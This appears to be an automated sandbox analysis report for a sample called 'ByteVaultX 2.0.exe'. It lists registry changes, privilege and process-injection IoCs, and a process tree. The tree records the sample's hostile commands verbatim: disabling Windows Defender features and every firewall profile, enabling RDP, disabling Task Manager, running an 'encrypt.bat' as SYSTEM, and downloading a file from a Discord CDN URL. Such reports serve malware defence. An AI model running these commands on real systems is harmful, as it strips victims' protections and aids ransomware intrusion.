\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Extensible Cache MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\Certificates MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames\ MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root\Certificates MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 0a0cfd5dfaaeda01 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\SharedCookie_MRACMigrationDone = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\OneTimeCleanup = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Rating Prompt Shown = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0" MicrosoftEdge.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4132 powershell.exe 4132 powershell.exe 4132 powershell.exe 4740 powershell.exe 4740 powershell.exe 4740 powershell.exe 4740 powershell.exe 1652 powershell.exe 1652 powershell.exe 1652 powershell.exe 1652 powershell.exe 1760 powershell.exe 1760 powershell.exe 1760 powershell.exe 1760 powershell.exe 824 powershell.exe 824 powershell.exe 824 powershell.exe 824 powershell.exe 396 powershell.exe 396 powershell.exe 396 powershell.exe 396 powershell.exe 392 powershell.exe 392 powershell.exe 392 powershell.exe 392 powershell.exe 1360 powershell.exe 1360 powershell.exe 1360 powershell.exe 1360 powershell.exe 3624 powershell.exe 3624 powershell.exe 3624 powershell.exe 3624 powershell.exe 4268 powershell.exe 4268 powershell.exe 4268 powershell.exe 4268 powershell.exe 3716 powershell.exe 3716 powershell.exe 3716 powershell.exe 3716 powershell.exe 2816 powershell.exe 2816 powershell.exe 2816 powershell.exe 2816 powershell.exe 2192 powershell.exe 2192 powershell.exe 2192 powershell.exe 2192 powershell.exe 704 powershell.exe 704 powershell.exe 704 powershell.exe 704 powershell.exe 1928 powershell.exe 1928 powershell.exe 1928 powershell.exe 1928 powershell.exe 3564 powershell.exe 3564 powershell.exe 3564 powershell.exe 3564 powershell.exe 1512 powershell.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 3356 MicrosoftEdgeCP.exe 3356 MicrosoftEdgeCP.exe 3356 MicrosoftEdgeCP.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4132 powershell.exe Token: SeIncreaseQuotaPrivilege 4132 powershell.exe Token: SeSecurityPrivilege 4132 powershell.exe Token: SeTakeOwnershipPrivilege 4132 powershell.exe Token: SeLoadDriverPrivilege 4132 powershell.exe Token: SeSystemProfilePrivilege 4132 powershell.exe Token: SeSystemtimePrivilege 4132 powershell.exe Token: SeProfSingleProcessPrivilege 4132 powershell.exe Token: SeIncBasePriorityPrivilege 4132 powershell.exe Token: SeCreatePagefilePrivilege 4132 powershell.exe Token: SeBackupPrivilege 4132 powershell.exe Token: SeRestorePrivilege 4132 powershell.exe Token: SeShutdownPrivilege 4132 powershell.exe Token: SeDebugPrivilege 4132 powershell.exe Token: SeSystemEnvironmentPrivilege 4132 powershell.exe Token: SeRemoteShutdownPrivilege 4132 powershell.exe Token: SeUndockPrivilege 4132 powershell.exe Token: SeManageVolumePrivilege 4132 powershell.exe Token: 33 4132 powershell.exe Token: 34 4132 powershell.exe Token: 35 4132 powershell.exe Token: 36 4132 powershell.exe Token: SeDebugPrivilege 4740 powershell.exe Token: SeDebugPrivilege 2332 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 2332 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 2332 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 2332 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 2968 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 2968 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 2968 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 2968 MicrosoftEdgeCP.exe Token: SeIncreaseQuotaPrivilege 4740 powershell.exe Token: SeSecurityPrivilege 4740 powershell.exe Token: SeTakeOwnershipPrivilege 4740 powershell.exe Token: SeLoadDriverPrivilege 4740 powershell.exe Token: SeSystemProfilePrivilege 4740 powershell.exe Token: SeSystemtimePrivilege 4740 powershell.exe Token: SeProfSingleProcessPrivilege 4740 powershell.exe Token: SeIncBasePriorityPrivilege 4740 powershell.exe Token: SeCreatePagefilePrivilege 4740 powershell.exe Token: SeBackupPrivilege 4740 powershell.exe Token: SeRestorePrivilege 4740 powershell.exe Token: SeShutdownPrivilege 4740 powershell.exe Token: SeDebugPrivilege 4740 powershell.exe Token: SeSystemEnvironmentPrivilege 4740 powershell.exe Token: SeRemoteShutdownPrivilege 4740 powershell.exe Token: SeUndockPrivilege 4740 powershell.exe Token: SeManageVolumePrivilege 4740 powershell.exe Token: 33 4740 powershell.exe Token: 34 4740 powershell.exe Token: 35 4740 powershell.exe Token: 36 4740 powershell.exe Token: SeDebugPrivilege 1652 powershell.exe Token: SeIncreaseQuotaPrivilege 1652 powershell.exe Token: SeSecurityPrivilege 1652 powershell.exe Token: SeTakeOwnershipPrivilege 1652 powershell.exe Token: SeLoadDriverPrivilege 1652 powershell.exe Token: SeSystemProfilePrivilege 1652 powershell.exe Token: SeSystemtimePrivilege 1652 powershell.exe Token: SeProfSingleProcessPrivilege 1652 powershell.exe Token: SeIncBasePriorityPrivilege 1652 powershell.exe Token: SeCreatePagefilePrivilege 1652 powershell.exe Token: SeBackupPrivilege 1652 powershell.exe Token: SeRestorePrivilege 1652 powershell.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 4676 MicrosoftEdge.exe 3356 MicrosoftEdgeCP.exe 2332 MicrosoftEdgeCP.exe 3356 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2196 wrote to memory of 3068 2196 ByteVaultX 2.0.exe 74 PID 2196 wrote to memory of 3068 2196 ByteVaultX 2.0.exe 74 PID 3068 wrote to memory of 4132 3068 ByteVaultX 2.0.exe 75 PID 3068 wrote to memory of 4132 3068 ByteVaultX 2.0.exe 75 PID 3068 wrote to memory of 2188 3068 ByteVaultX 2.0.exe 78 PID 3068 wrote to memory of 2188 3068 ByteVaultX 2.0.exe 78 PID 3068 wrote to memory of 2904 3068 ByteVaultX 2.0.exe 81 PID 3068 wrote to memory of 2904 3068 ByteVaultX 2.0.exe 81 PID 3068 wrote to memory of 2852 3068 ByteVaultX 2.0.exe 85 PID 3068 wrote to memory of 2852 3068 ByteVaultX 2.0.exe 85 PID 2852 wrote to memory of 4092 2852 cmd.exe 88 PID 2852 wrote to memory of 4092 2852 cmd.exe 88 PID 2852 wrote to memory of 1524 2852 cmd.exe 90 PID 2852 wrote to memory of 1524 2852 cmd.exe 90 PID 2852 wrote to memory of 1760 2852 cmd.exe 96 PID 2852 wrote to memory of 1760 2852 cmd.exe 96 PID 2852 wrote to memory of 2292 2852 cmd.exe 93 PID 2852 wrote to memory of 2292 2852 cmd.exe 93 PID 2852 wrote to memory of 4740 2852 cmd.exe 94 PID 2852 wrote to memory of 4740 2852 cmd.exe 94 PID 3356 wrote to memory of 2968 3356 MicrosoftEdgeCP.exe 92 PID 3356 wrote to memory of 2968 3356 MicrosoftEdgeCP.exe 92 PID 3356 wrote to memory of 2968 3356 MicrosoftEdgeCP.exe 92 PID 3356 wrote to memory of 2968 3356 MicrosoftEdgeCP.exe 92 PID 2852 wrote to memory of 1652 2852 cmd.exe 95 PID 2852 wrote to memory of 1652 2852 cmd.exe 95 PID 2852 wrote to memory of 1760 2852 cmd.exe 96 PID 2852 wrote to memory of 1760 2852 cmd.exe 96 PID 2852 wrote to memory of 824 2852 cmd.exe 97 PID 2852 wrote to memory of 824 2852 cmd.exe 97 PID 2852 wrote to memory of 396 2852 cmd.exe 98 PID 2852 wrote to memory of 396 2852 cmd.exe 98 PID 2852 wrote to memory of 3128 2852 cmd.exe 99 PID 2852 wrote to memory of 3128 2852 cmd.exe 99 PID 2852 wrote to memory of 4012 2852 cmd.exe 100 PID 2852 wrote to memory of 4012 2852 cmd.exe 100 PID 2852 wrote to memory of 1504 2852 cmd.exe 101 PID 2852 wrote to memory of 1504 2852 cmd.exe 101 PID 2852 wrote to memory of 4760 2852 cmd.exe 102 PID 2852 wrote to memory of 4760 2852 cmd.exe 102 PID 2852 wrote to memory of 168 2852 cmd.exe 103 PID 2852 wrote to memory of 168 2852 cmd.exe 103 PID 2852 wrote to memory of 2844 2852 cmd.exe 104 PID 2852 wrote to memory of 2844 2852 cmd.exe 104 PID 2852 wrote to memory of 2324 2852 cmd.exe 105 PID 2852 wrote to memory of 2324 2852 cmd.exe 105 PID 2852 wrote to memory of 392 2852 cmd.exe 107 PID 2852 wrote to memory of 392 2852 cmd.exe 107 PID 2852 wrote to memory of 1360 2852 cmd.exe 109 PID 2852 wrote to memory of 1360 2852 cmd.exe 109 PID 2852 wrote to memory of 3624 2852 cmd.exe 110 PID 2852 wrote to memory of 3624 2852 cmd.exe 110 PID 2852 wrote to memory of 4268 2852 cmd.exe 111 PID 2852 wrote to memory of 4268 2852 cmd.exe 111 PID 2852 wrote to memory of 3716 2852 cmd.exe 112 PID 2852 wrote to memory of 3716 2852 cmd.exe 112 PID 2852 wrote to memory of 2816 2852 cmd.exe 113 PID 2852 wrote to memory of 2816 2852 cmd.exe 113 PID 2852 wrote to memory of 2192 2852 cmd.exe 114 PID 2852 wrote to memory of 2192 2852 cmd.exe 114 PID 2852 wrote to memory of 704 2852 cmd.exe 115 PID 2852 wrote to memory of 704 2852 cmd.exe 115 PID 704 wrote to memory of 2512 704 powershell.exe 116 PID 704 wrote to memory of 2512 704 powershell.exe 116
Processes
-
C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2196 -
C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"2⤵
- Checks computer location settings
- Loads dropped DLL
- Drops desktop.ini file(s)
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4132
-
-
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall set allprofiles state off3⤵PID:2188
-
-
C:\Windows\SYSTEM32\runas.exerunas /user:NT-AUTORITÄT\SYSTEM cmd.exe /c "C:\Encrypt\encrypt.bat"3⤵PID:2904
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Encrypt\encrypt.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:2852 -
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"4⤵PID:4092
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f4⤵PID:1524
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"4⤵PID:1760
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f4⤵PID:2292
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4740
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1652
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1760
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:824
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:396
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable4⤵PID:3128
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE4⤵PID:4012
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off4⤵PID:1504
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off4⤵PID:4760
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off4⤵PID:168
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off4⤵PID:2844
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off4⤵
- Modifies Windows Firewall
PID:2324
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1360
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3624
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4268
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2816
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:2192
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:704 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"5⤵PID:2512
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"6⤵PID:1104
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f6⤵PID:4768
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"6⤵PID:2816
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f6⤵PID:1804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"6⤵
- Suspicious behavior: EnumeratesProcesses
PID:1928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"6⤵
- Suspicious behavior: EnumeratesProcesses
PID:3564
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"6⤵
- Suspicious behavior: EnumeratesProcesses
PID:1512
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"6⤵PID:1504
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"6⤵PID:1700
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable6⤵PID:1704
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE6⤵PID:4708
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off6⤵PID:3852
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off6⤵PID:4816
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off6⤵PID:3564
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off6⤵PID:1876
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off6⤵PID:4760
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"6⤵PID:1928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"6⤵PID:4220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"6⤵PID:3716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"6⤵PID:4272
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"6⤵PID:2300
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"6⤵PID:3852
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"6⤵
- Blocklisted process makes network request
PID:2192
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"6⤵
- Command and Scripting Interpreter: PowerShell
PID:1276 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"7⤵PID:1564
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"8⤵PID:2824
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f8⤵PID:4428
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"8⤵PID:4968
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f8⤵PID:2120
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"8⤵PID:4872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"8⤵PID:360
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"8⤵PID:2120
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"8⤵PID:4872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"8⤵PID:1760
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable8⤵PID:1616
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE8⤵PID:2824
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off8⤵PID:4068
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off8⤵PID:4860
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off8⤵PID:4080
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off8⤵PID:380
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off8⤵PID:1148
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"8⤵PID:4216
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"8⤵PID:3440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"8⤵PID:4012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"8⤵PID:4048
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"8⤵PID:3716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"8⤵PID:392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"8⤵
- Blocklisted process makes network request
PID:3372
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"8⤵
- Command and Scripting Interpreter: PowerShell
PID:4412 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"9⤵PID:3440
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"10⤵PID:1104
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f10⤵PID:1944
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"10⤵PID:4212
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f10⤵PID:1980
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"10⤵PID:1148
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"10⤵PID:4732
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"10⤵PID:164
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"10⤵PID:1148
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"10⤵PID:3052
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable10⤵PID:4664
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE10⤵
- Modifies Windows Firewall
PID:2436
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off10⤵PID:3716
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off10⤵PID:2980
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off10⤵PID:3876
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off10⤵PID:4412
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off10⤵PID:2344
-
-
